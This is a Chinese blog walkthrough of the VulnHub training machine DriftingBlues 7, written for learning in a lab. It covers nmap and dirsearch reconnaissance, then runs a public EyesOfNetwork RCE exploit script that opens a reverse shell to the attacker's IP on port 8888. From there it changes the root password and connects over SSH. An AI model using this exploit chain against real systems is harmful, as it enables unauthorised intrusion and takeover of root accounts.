VulnHub 之 DRIFTINGBLUES: 7

Vulnhub是一个很好的靶机平台,想看官网点这里。

今天学习DRIFTINGBLUES: 7,点击这里下载哦~

推荐使用virtualBox,我这里是VMware,看自己条件使用

难度:简单

基础练习,大佬可以绕过

这里我先总结一下,整个测试过程中的问题与情况:
(至于为什么要在开始做总结,主要是给各位新手朋友提供一个思路,不要直接照着我的抄)
1、 拿到一个测试站的时候,首先就是探测ip端口,因为有了门才要一步一步进入
2、 找到端口以后根据自己掌握的渗透手法,先自行判断哪里薄弱,根据端口去测试
3、一般web比较好突破(看自己)
4、然后看源码先自己判断,然后扫目录,看注入,找cms,看版本,找exp,等等这里就看自己的积累。
5、 多练习,不怕麻烦,多熟悉,我们一起坚持,与诸君共勉~

接下来导入虚拟机,这里选择NAT模式,成功后,如图:
VulnHub 之 DRIFTINGBLUES: 7_第1张图片
这里使用kali作为攻击机,首先查看kali的ip:

VulnHub 之 DRIFTINGBLUES: 7_第2张图片

使用nmap来探测靶机ip:

nmap -sS 192.198.81.0/24

VulnHub 之 DRIFTINGBLUES: 7_第3张图片
可以看到有80端口,先去浏览器找找线索:
VulnHub 之 DRIFTINGBLUES: 7_第4张图片
是一个network登录界面,试试若口令,爆破啥的

很遗憾,啥也没爆出来,试试扫描目录:

这里使用的是dirsearch,GitHub上边就有,搜一下就能找到,挺好用的

VulnHub 之 DRIFTINGBLUES: 7_第5张图片
没啥有用的信息,不过找到了EON的版本信息:
VulnHub 之 DRIFTINGBLUES: 7_第6张图片
找找exp,在这里

给执行权限:

chmod +x eonrce.py

在这里插入图片描述
利用exp:

/eonrce.py https://192.168.81.147/ -ip 192.168.81.148 -port 8888

成功:
VulnHub 之 DRIFTINGBLUES: 7_第7张图片

修改密码

passwd root

VulnHub 之 DRIFTINGBLUES: 7_第8张图片
这里我将密码改为root

因为之前ssh端口22开着呢,直接ssh连接:

ssh 192.168.81.147

VulnHub 之 DRIFTINGBLUES: 7_第9张图片
查看里边信息:
VulnHub 之 DRIFTINGBLUES: 7_第10张图片
拿到flag,成功~

你可能感兴趣的:(VulnHub,渗透测试)